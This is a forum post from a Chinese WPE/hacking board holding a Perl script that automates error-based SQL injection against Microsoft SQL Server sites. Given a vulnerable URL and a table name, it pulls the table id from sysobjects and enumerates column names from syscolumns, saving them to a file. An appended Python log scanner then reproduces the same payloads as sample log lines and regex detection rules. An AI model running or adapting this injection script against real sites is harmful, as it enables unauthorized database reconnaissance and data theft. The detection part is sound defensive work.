WPE|52wpe|我爱WPE

  • 2087 views
  • 0 replies

Posted on 2010-2-2 17:24:46
#!/usr/bin/perl -w
#codz by n3tl04d
#date 2008-4-13

use strict;
use LWP::UserAgent;

# Usage: <script> <injection point URL> <table name>
if(@ARGV != 2){
    print "用法:$0 注入点 表名";
    exit;
}

my $browser;
my $start=time();
my $talbe=$ARGV[1];
my $vul=$ARGV[0];

# Fetch a URL with a shared UserAgent. In list context returns
# (body, status line, success flag, response object); in scalar
# context returns the body, or nothing if the request failed.
sub do_get {
  $browser = LWP::UserAgent->new unless $browser;
  my $resp = $browser->get(@_);
  return ($resp->content, $resp->status_line, $resp->is_success, $resp)
    if wantarray;
  return unless $resp->is_success;
  return $resp->content;
}

# First request: look the table up in sysobjects and pick its object id
# out of the page's "value '...'" text.
my $tabl="$vul%20and%200<>(select%20count(*)%20from%20congaltan.dbo.sysobjects%20where%20xtype='u'%20and%20name='".$talbe."'%20and%20uid>(str(id)))";
my ($content, $status, $is_success) = do_get($tabl);

if ($content =~ m{value \'(.+?)\'}gi) {
    print "地到表id:$1\n";
    open(FILE,">>e:/perl/count.txt") || die ("could not open file");
    print FILE "===============================================================\n表名:$talbe id:$1\n";
    close(FILE);
    crake($1);
} else {
    print "不能爆表\n";
    exit;   # 'last' is not valid outside a loop; stop here instead
}

# Walk the columns of the table whose object id is $_[0], one name per
# request, excluding the names already found via NOT IN (...).
sub crake {
  my @arr1=();
  for (my $j=1;$j<=470;$j++) {
    print "猜解第$j个表列\n";
    my $arr=join("','",@arr1);   # scalar: the joined list is one string
    my $url="$vul%20and%200<>(select%20top%201%20name%20from%20congaltan.dbo.syscolumns%20where%20id=$_[0]%20and%20name%20not%20in('$arr'))";

    my ($content, $status, $is_success) = do_get($url);
    if ($content =~ m{value \'(.+?)\'}gi) {
      print "地到表列:$1\n";
      push(@arr1,$1);
      save($1);
    } else {
      print "猜解完成\n";
      last;
    }
  }
}


my $end=time();
my $time=$end-$start;
print "用时".$time."秒\n";

# Append one recovered column name to the output file.
sub save {
  open(FILE1,">>e:/perl/count.txt") || die ("could not open file");
  print FILE1 "-$_[0]\n";
  close(FILE1);
}
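As an added defensive example, not part of the original post and not the script author's code, the following Python scans web-server access-log lines for the two request shapes the script above sends: the sysobjects table-id probe and the syscolumns column enumeration. It URL-decodes the request path first so that `%20` versus `+` spacing does not change the result, then reports matching requests per source address. The log lines are constructed for this example; the database name `congaltan` and the query fragments are the ones that appear in the posted script.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format); the two
# injected requests reproduce the payload shapes the posted script builds.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Feb/2010:17:24:46 +0800] "GET /news.asp?id=12 HTTP/1.1" 200 5120
10.0.0.9 - - [02/Feb/2010:17:25:01 +0800] "GET /news.asp?id=12%20and%200<>(select%20count(*)%20from%20congaltan.dbo.sysobjects%20where%20xtype='u'%20and%20name='admin'%20and%20uid>(str(id))) HTTP/1.1" 500 812
10.0.0.9 - - [02/Feb/2010:17:25:03 +0800] "GET /news.asp?id=12%20and%200<>(select%20top%201%20name%20from%20congaltan.dbo.syscolumns%20where%20id=123456%20and%20name%20not%20in('')) HTTP/1.1" 500 815
10.0.0.7 - - [02/Feb/2010:17:26:10 +0800] "GET /search.asp?q=select+a+table HTTP/1.1" 200 2048
"""

# Minimal CLF parser: source, timestamp, method, request path, status code.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Detection rules applied to the URL-decoded request path.
RULES = {
    # "and 0<>(select count(*) from <db>.dbo.sysobjects where xtype=..."
    "mssql_table_probe": re.compile(
        r"\band\s+0\s*<>\s*\(\s*select\s+count\(\*\)\s+from\s+\S*sysobjects\b.*\bxtype\s*=",
        re.I,
    ),
    # "and 0<>(select top 1 name from <db>.dbo.syscolumns where ... not in(..."
    "mssql_column_enum": re.compile(
        r"\band\s+0\s*<>\s*\(\s*select\s+top\s+1\s+name\s+from\s+\S*syscolumns\b.*\bnot\s+in\s*\(",
        re.I,
    ),
}


def decode_path(path):
    """Decode the request path once ('+' and %xx), matching what the server sees."""
    return unquote(path.replace("+", " "))


def classify(path):
    """Return the name of the first rule that matches the decoded path, or None."""
    decoded = decode_path(path)
    for name, rx in RULES.items():
        if rx.search(decoded):
            return name
    return None


def scan_log(text):
    """Return one hit record per log line whose request matches a rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in CLF shape
        rule = classify(m["path"])
        if rule:
            hits.append({
                "src": m["src"],
                "ts": m["ts"],
                "rule": rule,
                "status": int(m["status"]),
                "path": m["path"],
            })
    return hits


def summarize(hits):
    """Count matching requests per source address (for alert thresholds)."""
    counts = {}
    for h in hits:
        counts[h["src"]] = counts.get(h["src"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f'{h["ts"]} {h["src"]} {h["rule"]} status={h["status"]}')
    print(summarize(found))
```

The benign fourth line contains the word `select` but no `and 0<>(select ...` comparison, so it does not fire; matching on the decoded text and on the full structural shape, rather than on a keyword, is what keeps the rule from flagging ordinary search traffic. The per-source summary is the natural input to a threshold alert, since the script issues one request per column and produces a burst of similar 500-status requests from one address.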


Mobile version|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )
